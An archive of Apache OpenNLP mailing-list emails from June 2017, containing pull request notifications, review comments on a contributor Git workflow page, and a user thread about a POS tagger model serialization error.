- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1092

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/237.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #237


commit 97281ba4a752536c261bc739e165309e70363399
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-06-26T14:20:09Z

OPENNLP-1092: Fix pos model serialization bug




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #236: OPENNLP-1097: Enable the normalizers by default i...

2017-06-22 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/236

OPENNLP-1097: Enable the normalizers by default in langdetect

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1097

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/236.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #236






---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #235: OPENNLP-1096: Swap for loops in ngram generation ...

2017-06-22 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/235

OPENNLP-1096: Swap for loops in ngram generation to be cache friendly

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1096

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/235.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #235


commit 140695f4cd97080d48e9915e597db0fbf65d6320
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-06-22T12:41:56Z

OPENNLP-1096: Swap for loops in ngram generation to be cache friendly




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp-site pull request #11: OPENNLP-1045: Git documentation for developer...

2017-06-22 Thread kottmann
Github user kottmann commented on a diff in the pull request:

https://github.com/apache/opennlp-site/pull/11#discussion_r123445407
  
--- Diff: src/main/jbake/content/using-git.ad ---
@@ -0,0 +1,113 @@
+
+   Licensed to the Apache Software Foundation (ASF) under one
+   or more contributor license agreements.  See the NOTICE file
+   distributed with this work for additional information
+   regarding copyright ownership.  The ASF licenses this file
+   to you under the Apache License, Version 2.0 (the
+   "License"); you may not use this file except in compliance
+   with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing,
+   software distributed under the License is distributed on an
+   "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+   KIND, either express or implied.  See the License for the
+   specific language governing permissions and limitations
+   under the License.   
+
+= Using Git
+:jbake-type: page
+:jbake-tags: maven
+:jbake-status: published
+:idprefix:
+
+## Introduction
+
+The Apache OpenNLP project has a series of rules that every developer must 
adhere to. The contents in this page
+can be helpful even to experienced developers, as it includes information 
about merging GitHub pull requests
+programmatically, which is not an easy task, or sometimes users are more 
familiar with the web interface.
+
+Simple rules include always merging pull requests with the fast-forward, 
using a JIRA ticket ID in the commit message
+whenever possible, and always squashing pull requests. Also, changes are 
verified by a build server, so developers
+must remember to check if all tests pass, as well as other quality checks 
such as code style.
+
+## Cloning the OpenNLP Git repository
+
+After obtaining committership to OpenNLP, you probably want to submit your 
changes to the project source repository.
+This section contains the steps that every committer must follow, in order 
to make sure every developer is following
+the workflow, and have a consistent and simple commit tree.
+
+git clone https://git-wip-us.apache.org/repos/asf/opennlp.git
+cd opennlp
+git config user.name "Your Name"
+git config user.email "your-email"
+git config merge.ff only
+
+You can also clone the project web site repository.
+
+https://git-wip-us.apache.org/repos/asf/opennlp.git
+# repeat remaining steps as above
+
+In order to test your commit rights, and following a project tradition, 
normally the first commit of every new
+member is to add his/her name to the list of project members. Look for the 
`team.ad` source file in the web site
+repository, add your name, and try sending your first commit.
+
+For a complete list of the project repositories, visit the 
link:/source-code.html[Source Code] section.
+
+## Merging Pull Requests
+
+This section documents the process of merging code changes contributed via
+link:https://help.github.com/articles/about-pull-requests/[Github Pull 
Requests]. It is important to
+remember to **always merge with 
link:https://git-scm.com/docs/git-merge[fast-forward]**. If you followed the 
steps in
+the first section, your local working copy should be already configured 
for that. Otherwise, remember to use `ff-only`
+when merging.
+
+### Adding a remote repository pointing to GitHub
+
+In order to fetch the pull requests in GitHub, you need to add a remote 
repository.
+
+git remote add github https://github.com/apache/opennlp.git
+git fetch --all
+git fetch github pull//head:
+git checkout 
+
+Replacing `` by the GitHub pull request ID (you can find it in 
the pull request URL) and `` by
+the name of the new local branch. If you have suggestions to enhance or 
fix the pull request, send your comments via
+the GitHub user interface, or add a comment to the JIRA ticket  if 
any.
+
+Once you are happy with the changes, you can check out the master branch, 
and merge the pull request. Remember
+to make sure the **branch has been rebase'd against master**, and also 
that all tests pass.
+
+git checkout master
+git merge --ff-only 
+git push origin master
+
+In case other commits happened after the pull request was submitted, you 
must ask the user to rebase the pull
+request against the master branch, and squash his commit. An alternative 
for that, is to rebase and squash the commits
+yourself, when there is no feedback from the user.
+
+git checkout 
+git rebase master
+# squash a

[GitHub] opennlp-site pull request #11: OPENNLP-1045: Git documentation for developer...

2017-06-22 Thread kottmann
Github user kottmann commented on a diff in the pull request:

https://github.com/apache/opennlp-site/pull/11#discussion_r123445203
  
--- Diff: src/main/jbake/content/using-git.ad ---
@@ -0,0 +1,113 @@
+
+   Licensed to the Apache Software Foundation (ASF) under one
+   or more contributor license agreements.  See the NOTICE file
+   distributed with this work for additional information
+   regarding copyright ownership.  The ASF licenses this file
+   to you under the Apache License, Version 2.0 (the
+   "License"); you may not use this file except in compliance
+   with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing,
+   software distributed under the License is distributed on an
+   "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+   KIND, either express or implied.  See the License for the
+   specific language governing permissions and limitations
+   under the License.   
+
+= Using Git
+:jbake-type: page
+:jbake-tags: maven
+:jbake-status: published
+:idprefix:
+
+## Introduction
+
+The Apache OpenNLP project has a series of rules that every developer must 
adhere to. The contents in this page
+can be helpful even to experienced developers, as it includes information 
about merging GitHub pull requests
+programmatically, which is not an easy task, or sometimes users are more 
familiar with the web interface.
+
+Simple rules include always merging pull requests with the fast-forward, 
using a JIRA ticket ID in the commit message
+whenever possible, and always squashing pull requests. Also, changes are 
verified by a build server, so developers
+must remember to check if all tests pass, as well as other quality checks 
such as code style.
+
+## Cloning the OpenNLP Git repository
+
+After obtaining committership to OpenNLP, you probably want to submit your 
changes to the project source repository.
+This section contains the steps that every committer must follow, in order 
to make sure every developer is following
+the workflow, and have a consistent and simple commit tree.
+
+git clone https://git-wip-us.apache.org/repos/asf/opennlp.git
+cd opennlp
+git config user.name "Your Name"
+git config user.email "your-email"
+git config merge.ff only
+
+You can also clone the project web site repository.
+
+https://git-wip-us.apache.org/repos/asf/opennlp.git
+# repeat remaining steps as above
+
+In order to test your commit rights, and following a project tradition, 
normally the first commit of every new
+member is to add his/her name to the list of project members. Look for the 
`team.ad` source file in the web site
+repository, add your name, and try sending your first commit.
+
+For a complete list of the project repositories, visit the 
link:/source-code.html[Source Code] section.
+
+## Merging Pull Requests
+
+This section documents the process of merging code changes contributed via
+link:https://help.github.com/articles/about-pull-requests/[Github Pull 
Requests]. It is important to
+remember to **always merge with 
link:https://git-scm.com/docs/git-merge[fast-forward]**. If you followed the 
steps in
+the first section, your local working copy should be already configured 
for that. Otherwise, remember to use `ff-only`
+when merging.
+
+### Adding a remote repository pointing to GitHub
+
+In order to fetch the pull requests in GitHub, you need to add a remote 
repository.
+
+git remote add github https://github.com/apache/opennlp.git
+git fetch --all
+git fetch github pull//head:
+git checkout 
+
+Replacing `` by the GitHub pull request ID (you can find it in 
the pull request URL) and `` by
+the name of the new local branch. If you have suggestions to enhance or 
fix the pull request, send your comments via
+the GitHub user interface, or add a comment to the JIRA ticket  if 
any.
+
+Once you are happy with the changes, you can check out the master branch, 
and merge the pull request. Remember
+to make sure the **branch has been rebase'd against master**, and also 
that all tests pass.
+
+git checkout master
+git merge --ff-only 
+git push origin master
+
+In case other commits happened after the pull request was submitted, you 
must ask the user to rebase the pull
+request against the master branch, and squash his commit. An alternative 
for that, is to rebase and squash the commits
+yourself, when there is no feedback from the user.
+
+git checkout 
+git rebase master
+# squash a

[GitHub] opennlp-site pull request #11: OPENNLP-1045: Git documentation for developer...

2017-06-22 Thread kottmann
Github user kottmann commented on a diff in the pull request:

https://github.com/apache/opennlp-site/pull/11#discussion_r123445064
  
--- Diff: src/main/jbake/content/using-git.ad ---
@@ -0,0 +1,113 @@
+
+   Licensed to the Apache Software Foundation (ASF) under one
+   or more contributor license agreements.  See the NOTICE file
+   distributed with this work for additional information
+   regarding copyright ownership.  The ASF licenses this file
+   to you under the Apache License, Version 2.0 (the
+   "License"); you may not use this file except in compliance
+   with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing,
+   software distributed under the License is distributed on an
+   "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+   KIND, either express or implied.  See the License for the
+   specific language governing permissions and limitations
+   under the License.   
+
+= Using Git
+:jbake-type: page
+:jbake-tags: maven
+:jbake-status: published
+:idprefix:
+
+## Introduction
+
+The Apache OpenNLP project has a series of rules that every developer must 
adhere to. The contents in this page
+can be helpful even to experienced developers, as it includes information 
about merging GitHub pull requests
+programmatically, which is not an easy task, or sometimes users are more 
familiar with the web interface.
+
+Simple rules include always merging pull requests with the fast-forward, 
using a JIRA ticket ID in the commit message
+whenever possible, and always squashing pull requests. Also, changes are 
verified by a build server, so developers
+must remember to check if all tests pass, as well as other quality checks 
such as code style.
+
+## Cloning the OpenNLP Git repository
+
+After obtaining committership to OpenNLP, you probably want to submit your 
changes to the project source repository.
+This section contains the steps that every committer must follow, in order 
to make sure every developer is following
+the workflow, and have a consistent and simple commit tree.
+
+git clone https://git-wip-us.apache.org/repos/asf/opennlp.git
+cd opennlp
+git config user.name "Your Name"
+git config user.email "your-email"
+git config merge.ff only
+
+You can also clone the project web site repository.
+
+https://git-wip-us.apache.org/repos/asf/opennlp.git
+# repeat remaining steps as above
+
+In order to test your commit rights, and following a project tradition, 
normally the first commit of every new
+member is to add his/her name to the list of project members. Look for the 
`team.ad` source file in the web site
+repository, add your name, and try sending your first commit.
+
+For a complete list of the project repositories, visit the 
link:/source-code.html[Source Code] section.
+
+## Merging Pull Requests
+
+This section documents the process of merging code changes contributed via
+link:https://help.github.com/articles/about-pull-requests/[Github Pull 
Requests]. It is important to
+remember to **always merge with 
link:https://git-scm.com/docs/git-merge[fast-forward]**. If you followed the 
steps in
+the first section, your local working copy should be already configured 
for that. Otherwise, remember to use `ff-only`
+when merging.
+
+### Adding a remote repository pointing to GitHub
+
+In order to fetch the pull requests in GitHub, you need to add a remote 
repository.
+
+git remote add github https://github.com/apache/opennlp.git
+git fetch --all
+git fetch github pull//head:
+git checkout 
+
+Replacing `` by the GitHub pull request ID (you can find it in 
the pull request URL) and `` by
+the name of the new local branch. If you have suggestions to enhance or 
fix the pull request, send your comments via
+the GitHub user interface, or add a comment to the JIRA ticket  if 
any.
+
+Once you are happy with the changes, you can check out the master branch, 
and merge the pull request. Remember
+to make sure the **branch has been rebase'd against master**, and also 
that all tests pass.
+
+git checkout master
+git merge --ff-only 
+git push origin master
+
+In case other commits happened after the pull request was submitted, you 
must ask the user to rebase the pull
--- End diff --

The easiest thing is to rebase yourself, the contributor only needs to be 
involved if there are conflicts.


---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If

[GitHub] opennlp-site pull request #21: OPENNLP-1045: Add Git development page (adapt...

2017-06-22 Thread kottmann
Github user kottmann commented on a diff in the pull request:

https://github.com/apache/opennlp-site/pull/21#discussion_r123442070
  
--- Diff: src/main/jbake/content/using-git.ad ---
@@ -0,0 +1,178 @@
+
+   Licensed to the Apache Software Foundation (ASF) under one
+   or more contributor license agreements.  See the NOTICE file
+   distributed with this work for additional information
+   regarding copyright ownership.  The ASF licenses this file
+   to you under the Apache License, Version 2.0 (the
+   "License"); you may not use this file except in compliance
+   with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing,
+   software distributed under the License is distributed on an
+   "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+   KIND, either express or implied.  See the License for the
+   specific language governing permissions and limitations
+   under the License.   
+
+= Using Git
+:jbake-type: page
+:jbake-tags: maven
+:jbake-status: published
+:idprefix:
+
+There are several ways to setup Git for committers and contributors. 
Contributors can safely setup Git any way they
+choose but committers should take extra care since they can push new 
commits to the master at Apache and various
+policies there make backing out mistakes problematic. Therefore all but 
very small changes should go through a PR,
+even for committers. To keep the commit history clean take note of the use 
of `--squash` below when merging into
+`apache/master`.
+
+## Git setup for Committers
+
+This describes setup for one local repo and two remotes. It allows you to 
push the code on your machine to either your
+GitHub repo or to Git at Apache (i.e. git-wip-us.apache.org). You will 
want to fork GitHub's apache/opennlp to your own
+account on GitHub, this will enable Pull Requests of your own. Cloning 
this fork locally will set up "origin" to point
+to your remote fork on GitHub as the default remote. So if you perform 
"git push origin master" it will go to GitHub.
+
+To attach to the apache Git repo do the following:
+
+git remote add apache 
https://git-wip-us.apache.org/repos/asf/opennlp.git
+
+To check your remote setup:
+
+git remote -v
+
+You should see something like this:
+
+originhttps://github.com/your-github-id/opennlp.git (fetch)
+originhttps://github.com/your-github-id/opennlp.git (push)
+apachehttps://git-wip-us.apache.org/repos/asf/opennlp.git (fetch)
+apachehttps://git-wip-us.apache.org/repos/asf/opennlp.git (push)
+
+Now if you want to experiment with a branch, this by default points to 
your GitHub account because "origin" is default.
+You can work as you normally do using just GitHub, until you are ready to 
merge with the Apache remote repository.
+Some conventions will integrate with Apache JIRA ticket numbers.
+
+git checkout -b opennlp- # typically is a JIRA ticket number
+#do some work on the branch
+git commit -a -m "doing some work"
+git push origin opennlp- # notice pushing to **origin** not 
**apache**
+
+Once you are ready to commit to the Apache remote you can merge and push 
them directly, or better yet create a
+pull request (PR). 
+
+## How to create a PR (committers)
+
+Push your branch to GitHub:
+
+git checkout opennlp-
+git push origin opennlp-
+
+Go to your opennlp- branch on GitHub. Since you forked it from 
GitHub's apache/opennlp it will default any PR to
+go to apache/master. 
+
+* Click the green "Compare, review, and create pull request" button. 
+* You can edit the _to_ and _from_ for the PR if it is not correct. The 
"base fork" should be apache/opennlp unless
+you are collaborating separately with one of the committers on the list. 
The "base" will be master. Do not submit a
+PR to one of the other branches unless you know what you are doing. The 
"head fork" will be your forked repo and the
+"compare" will be your opennlp- branch. 
+* Click the "Create pull request" button and name the request 
"OPENNLP-" (uppercase). This will connect the
+comments of the PR to the mailing list and JIRA comments.
+* From now on the PR lives on GitHub's apache/opennlp. You can use the 
commenting UI there. 
+* If you are looking for a review or sharing with someone else say so in 
the comments but do not worry about 
+automated merging of your PR -- you will have to do that later. The P

[GitHub] opennlp-site pull request #21: OPENNLP-1045: Add Git development page (adapt...

2017-06-22 Thread kottmann
Github user kottmann commented on a diff in the pull request:

https://github.com/apache/opennlp-site/pull/21#discussion_r123438951
  
--- Diff: src/main/jbake/content/using-git.ad ---
@@ -0,0 +1,178 @@
+
+   Licensed to the Apache Software Foundation (ASF) under one
+   or more contributor license agreements.  See the NOTICE file
+   distributed with this work for additional information
+   regarding copyright ownership.  The ASF licenses this file
+   to you under the Apache License, Version 2.0 (the
+   "License"); you may not use this file except in compliance
+   with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing,
+   software distributed under the License is distributed on an
+   "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+   KIND, either express or implied.  See the License for the
+   specific language governing permissions and limitations
+   under the License.   
+
+= Using Git
+:jbake-type: page
+:jbake-tags: maven
+:jbake-status: published
+:idprefix:
+
+There are several ways to setup Git for committers and contributors. 
Contributors can safely setup Git any way they
+choose but committers should take extra care since they can push new 
commits to the master at Apache and various
+policies there make backing out mistakes problematic. Therefore all but 
very small changes should go through a PR,
+even for committers. To keep the commit history clean take note of the use 
of `--squash` below when merging into
+`apache/master`.
+
+## Git setup for Committers
+
+This describes setup for one local repo and two remotes. It allows you to 
push the code on your machine to either your
+GitHub repo or to Git at Apache (i.e. git-wip-us.apache.org). You will 
want to fork GitHub's apache/opennlp to your own
+account on GitHub, this will enable Pull Requests of your own. Cloning 
this fork locally will set up "origin" to point
+to your remote fork on GitHub as the default remote. So if you perform 
"git push origin master" it will go to GitHub.
+
+To attach to the apache Git repo do the following:
+
+git remote add apache 
https://git-wip-us.apache.org/repos/asf/opennlp.git
+
+To check your remote setup:
+
+git remote -v
+
+You should see something like this:
+
+originhttps://github.com/your-github-id/opennlp.git (fetch)
+originhttps://github.com/your-github-id/opennlp.git (push)
+apachehttps://git-wip-us.apache.org/repos/asf/opennlp.git (fetch)
+apachehttps://git-wip-us.apache.org/repos/asf/opennlp.git (push)
+
+Now if you want to experiment with a branch, this by default points to 
your GitHub account because "origin" is default.
+You can work as you normally do using just GitHub, until you are ready to 
merge with the Apache remote repository.
+Some conventions will integrate with Apache JIRA ticket numbers.
+
+git checkout -b opennlp- # typically is a JIRA ticket number
+#do some work on the branch
+git commit -a -m "doing some work"
+git push origin opennlp- # notice pushing to **origin** not 
**apache**
+
+Once you are ready to commit to the Apache remote you can merge and push 
them directly, or better yet create a
--- End diff --

We should not say "you can merge and push them directly"


---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #232: Remove pmap indirection

2017-06-16 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/232

Remove pmap indirection

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp pmap_perf

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/232.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #232


commit 7f1dd3b3204df67973575d4a538557b04a19460c
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-06-14T12:34:14Z

Remove pmap indirection




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


Re: Missing serializer for postagger.bin

2017-06-14 Thread Joern Kottmann
ALIZED))) {
> >> model.serialize(modelOut);
> >> }
> >>
> >> } catch (Exception ex) {
> >> ex.printStackTrace();
> >> }
> >>
> >> }
> >> }
> >> }
> >>
> >> public static POSModel loadPosTagger (String modelName) {
> >>
> >> try (InputStream modelIn = new FileInputStream(modelName)) {
> >> POSModel model = new POSModel(modelIn);
> >> return model;
> >> }
> >> catch (Exception ex) { ex.printStackTrace();  }
> >>
> >> return null;
> >> }
> >> }
> >>
> >> *GENERATORS:*
> >>
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >>
> >>
> >> *OUTPUT (with error):*
> >>
> >>
> >> *Indexing events using cutoff of 0 Computing event counts...  done. 30
> >> events Indexing...  done.Collecting events... Done
> indexing.Incorporating
> >> indexed data for training...  done. Number of Event Tokens: 30
> Number of
> >> Outcomes: 2  Number of Predicates: 144Computing model
> >> parameters...Performing 300 iterations.  1:  . (27/30) 0.9  2:  .
> (30/30)
> >> 1.0  3:  . (30/30) 1.0  4:  . (30/30) 1.0  5:  . (30/30) 1.0Stopping:
> >> change in training set accuracy less than 1.0E-5Stats: (30/30)
> >> 1.0...done.Compressed 144 parameters to 621 outcome
> >> patternsjava.lang.IllegalStateException: Missing serializer for
> >> postagger.bin at
> >> opennlp.tools.util.model.BaseModel.serialize(BaseModel.java:589) at
> >> com.damiano.trainer.Test.(Test.java:75) at
> >> com.damiano.trainer.Test.main(Test.java:31)*
> >>
> >> 2017-06-07 15:48 GMT+02:00 Damiano Porta <damianopo...@gmail.com>:
> >>
> >>> Hmm let me try again, yes i copied it badly, i think the names are
> >>> correct, i will give you a working example.
> >>>
> >>> 2017-06-07 15:46 GMT+02:00 Joern Kottmann <kottm...@gmail.com>:
> >>>
> >>>> Ok, but are you sure you used matching names? The exception states
> >>>> it-pos-maxent.bin,
> >>>> which object did you map to it?
> >>>>
> >>>> Jörn
> >>>>
> >>>> On Wed, Jun 7, 2017 at 3:22 PM, Damiano Porta <damianopo...@gmail.com
> >
> >>>> wrote:
> >>>>
> >>>> > Hi Jorn! Yes
> >>>> >
> >>>> > 
> >>>> > org.apache.opennlp
> >>>> > opennlp-tools
> >>>> > 1.8.0
> >>>> > 
> >>>> >
> >>>> > Do i need others dependencies too?
> >>>> >
> >>>> >
> >>>> >
> >>>> > 2017-06-07 14:53 GMT+02:00 Joern Kottmann <kottm...@gmail.com>:
> >>>> >
> >>>> > > This should be working. Did you test with 1.8.0?
> >>>> > >
> >>>> > > Jörn
> >>>> > >
> >>>> > > On Mon, Jun 5, 2017 at 3:43 PM, Damiano Porta <
> >>>> damianopo...@gmail.com>
> >>>> > > wrote:
> >>>> > >
> >>>> > > > Hello,
> >>>> > > > i am using the POSTaggerFeatureGenerator via generators.xml
> >>>> > > >
> >>>> > > > 
> >>>> > > >
> >>>> > > > during the training i add this model in the resources doing:
> >>>> > > >
> >>>> > > > HashMap<String, Object> map = new HashMap<>();
> >>>> > > > map.put("postagger.bin", myPostaggerModel);
> >>>> > > >
> >>>> > > >
> >>>> > > >  factory = new TokenNameFinderFactory(
> >>>> > > >IOUtils.toByteArray(in),
> >>>> > > >map,
> >>>> > > >new BioCodec()
> >>>> > > >  );
> >>>> > > >
> >>>> > > > I get this error:
> >>>> > > >
> >>>> > > > java.lang.IllegalStateException: Missing serializer for
> >>>> > > it-pos-maxent.bin
> >>>> > > > at opennlp.tools.util.model.BaseModel.serialize(BaseModel.java:
> >>>> 589)
> >>>> > > > at com.damiano.nlp.ner.trainer.Trainer.(Trainer.java:187)
> >>>> > > > at com.damiano.nlp.ner.trainer.Trainer.main(Trainer.java:44)
> >>>> > > > 2017-06-05 15:37:35 INFO  Trainer:192 -
> >>>> java.lang.IllegalStateExceptio
> >>>> > n:
> >>>> > > > Missing serializer for postagger.bin
> >>>> > > >
> >>>> > > > Do i have to change the extension of the file?
> >>>> > > >
> >>>> > > > Thanks
> >>>> > > >
> >>>> > >
> >>>> >
> >>>>
> >>>
> >>>
> >>
> >
>


Re: Missing serializer for postagger.bin

2017-06-07 Thread Joern Kottmann
Ok, but are you sure you used matching names? The exception states
it-pos-maxent.bin,
which object did you map to it?

Jörn

On Wed, Jun 7, 2017 at 3:22 PM, Damiano Porta <damianopo...@gmail.com>
wrote:

> Hi Jorn! Yes
>
> 
> org.apache.opennlp
> opennlp-tools
> 1.8.0
> 
>
> Do i need others dependencies too?
>
>
>
> 2017-06-07 14:53 GMT+02:00 Joern Kottmann <kottm...@gmail.com>:
>
> > This should be working. Did you test with 1.8.0?
> >
> > Jörn
> >
> > On Mon, Jun 5, 2017 at 3:43 PM, Damiano Porta <damianopo...@gmail.com>
> > wrote:
> >
> > > Hello,
> > > i am using the POSTaggerFeatureGenerator via generators.xml
> > >
> > > 
> > >
> > > during the training i add this model in the resources doing:
> > >
> > > HashMap<String, Object> map = new HashMap<>();
> > > map.put("postagger.bin", myPostaggerModel);
> > >
> > >
> > >  factory = new TokenNameFinderFactory(
> > >IOUtils.toByteArray(in),
> > >map,
> > >new BioCodec()
> > >  );
> > >
> > > I get this error:
> > >
> > > java.lang.IllegalStateException: Missing serializer for
> > it-pos-maxent.bin
> > > at opennlp.tools.util.model.BaseModel.serialize(BaseModel.java:589)
> > > at com.damiano.nlp.ner.trainer.Trainer.(Trainer.java:187)
> > > at com.damiano.nlp.ner.trainer.Trainer.main(Trainer.java:44)
> > > 2017-06-05 15:37:35 INFO  Trainer:192 - java.lang.IllegalStateExceptio
> n:
> > > Missing serializer for postagger.bin
> > >
> > > Do i have to change the extension of the file?
> > >
> > > Thanks
> > >
> >
>


Re: Missing serializer for postagger.bin

2017-06-07 Thread Joern Kottmann
This should be working. Did you test with 1.8.0?

Jörn

On Mon, Jun 5, 2017 at 3:43 PM, Damiano Porta 
wrote:

> Hello,
> i am using the POSTaggerFeatureGenerator via generators.xml
>
> 
>
> during the training i add this model in the resources doing:
>
> HashMap map = new HashMap<>();
> map.put("postagger.bin", myPostaggerModel);
>
>
>  factory = new TokenNameFinderFactory(
>IOUtils.toByteArray(in),
>map,
>new BioCodec()
>  );
>
> I get this error:
>
> java.lang.IllegalStateException: Missing serializer for it-pos-maxent.bin
> at opennlp.tools.util.model.BaseModel.serialize(BaseModel.java:589)
> at com.damiano.nlp.ner.trainer.Trainer.(Trainer.java:187)
> at com.damiano.nlp.ner.trainer.Trainer.main(Trainer.java:44)
